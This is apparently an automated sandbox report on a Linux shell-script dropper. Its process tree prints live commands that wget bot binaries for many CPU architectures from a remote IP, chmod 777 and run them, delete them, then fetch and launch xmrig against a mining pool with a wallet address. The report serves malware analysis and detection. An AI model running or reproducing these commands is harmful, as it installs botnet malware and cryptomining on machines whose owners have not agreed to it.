Analysis
-
max time kernel
95s -
max time network
96s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 04:09
Static task
static1
Behavioral task
behavioral1
Sample
tyo2831qq.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
tyo2831qq.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
tyo2831qq.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
tyo2831qq.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
tyo2831qq.sh
-
Size
1KB
-
MD5
e12d6a1166c4e290ed4ba39f96c780ad
-
SHA1
57038253b27c0312102758d25a77b5d1859cba3e
-
SHA256
5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
-
SHA512
276aabcf2037ad435a105ded3f3bfb8491fb391d5e1d49942d41774807c3f0b4e15d1ed18a57f0d783cd9aafee3ce1a96e561d3ee6da02b5d6c51fc579bb91ee
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 669 chmod 679 chmod 689 chmod 702 chmod 710 chmod 745 chmod 764 chmod 659 chmod 685 chmod 693 chmod 721 chmod 729 chmod -
Executes dropped EXE 1 IoCs
Processes:
botsioc pid process /tmp/bots 671 bots -
Reads system routing table 1 TTPs 3 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
tyo2831qq.arm7tyo2831qq.arm6tyo2831qq.ppcdescription ioc process File opened for reading /proc/net/route tyo2831qq.arm7 File opened for reading /proc/net/route tyo2831qq.arm6 File opened for reading /proc/net/route tyo2831qq.ppc -
Reads system network configuration 1 TTPs 3 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
tyo2831qq.ppctyo2831qq.arm7tyo2831qq.arm6description ioc process File opened for reading /proc/net/route tyo2831qq.ppc File opened for reading /proc/net/route tyo2831qq.arm7 File opened for reading /proc/net/route tyo2831qq.arm6 -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgettyo2831qq.mipsrmpid process 645 wget 661 tyo2831qq.mips 756 rm -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/tyo2831qq.mpsl wget File opened for modification /tmp/tyo2831qq.ppc wget File opened for modification /tmp/tyo2831qq.i586 wget File opened for modification /tmp/tyo2831qq.arm7 wget File opened for modification /tmp/tyo2831qq.mips wget File opened for modification /tmp/tyo2831qq.sh4 wget File opened for modification /tmp/tyo2831qq.x86 wget File opened for modification /tmp/tyo2831qq.arm6 wget File opened for modification /tmp/tyo2831qq.x32 wget File opened for modification /tmp/tyo2831qq.m68k wget File opened for modification /tmp/bots wget
Processes
-
/tmp/tyo2831qq.sh/tmp/tyo2831qq.sh1⤵PID:643
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:645 -
/bin/chmodchmod 777 tyo2831qq.mips2⤵
- File and Directory Permissions Modification
PID:659 -
/tmp/tyo2831qq.mips./tyo2831qq.mips2⤵
- System Network Configuration Discovery
PID:661 -
/usr/bin/wgetwget http://31.172.80.237/bots2⤵
- Writes file to tmp directory
PID:664 -
/bin/chmodchmod 777 bots2⤵
- File and Directory Permissions Modification
PID:669 -
/tmp/bots./bots2⤵
- Executes dropped EXE
PID:671 -
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.mpsl2⤵
- Writes file to tmp directory
PID:673 -
/bin/chmodchmod 777 tyo2831qq.mpsl2⤵
- File and Directory Permissions Modification
PID:679 -
/tmp/tyo2831qq.mpsl./tyo2831qq.mpsl2⤵PID:680
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.sh42⤵
- Writes file to tmp directory
PID:683 -
/bin/chmodchmod 777 tyo2831qq.sh42⤵
- File and Directory Permissions Modification
PID:685 -
/tmp/tyo2831qq.sh4./tyo2831qq.sh42⤵PID:686
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.x862⤵
- Writes file to tmp directory
PID:688 -
/bin/chmodchmod 777 tyo2831qq.x862⤵
- File and Directory Permissions Modification
PID:689 -
/tmp/tyo2831qq.x86./tyo2831qq.x862⤵PID:690
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm62⤵
- Writes file to tmp directory
PID:692 -
/bin/chmodchmod 777 tyo2831qq.arm62⤵
- File and Directory Permissions Modification
PID:693 -
/tmp/tyo2831qq.arm6./tyo2831qq.arm62⤵
- Reads system routing table
- Reads system network configuration
PID:694 -
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.x322⤵
- Writes file to tmp directory
PID:697 -
/bin/chmodchmod 777 tyo2831qq.x322⤵
- File and Directory Permissions Modification
PID:702 -
/tmp/tyo2831qq.x32./tyo2831qq.x322⤵PID:703
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.ppc2⤵
- Writes file to tmp directory
PID:705 -
/bin/chmodchmod 777 tyo2831qq.ppc2⤵
- File and Directory Permissions Modification
PID:710 -
/tmp/tyo2831qq.ppc./tyo2831qq.ppc2⤵
- Reads system routing table
- Reads system network configuration
PID:712 -
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.i5862⤵
- Writes file to tmp directory
PID:715 -
/bin/chmodchmod 777 tyo2831qq.i5862⤵
- File and Directory Permissions Modification
PID:721 -
/tmp/tyo2831qq.i586./tyo2831qq.i5862⤵PID:722
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.m68k2⤵
- Writes file to tmp directory
PID:724 -
/bin/chmodchmod 777 tyo2831qq.m68k2⤵
- File and Directory Permissions Modification
PID:729 -
/tmp/tyo2831qq.m68k./tyo2831qq.m68k2⤵PID:731
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.spc2⤵PID:734
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm42⤵PID:737
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm72⤵
- Writes file to tmp directory
PID:740 -
/bin/chmodchmod 777 tyo2831qq.arm72⤵
- File and Directory Permissions Modification
PID:745 -
/tmp/tyo2831qq.arm7./tyo2831qq.arm72⤵
- Reads system routing table
- Reads system network configuration
PID:747 -
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm52⤵PID:750
-
/bin/rmrm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x862⤵
- System Network Configuration Discovery
PID:756 -
/usr/bin/wgetwget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig2⤵PID:759
-
/bin/chmodchmod 777 xmrig2⤵
- File and Directory Permissions Modification
PID:764 -
/tmp/xmrig./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B2⤵PID:765
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD52615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA14286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78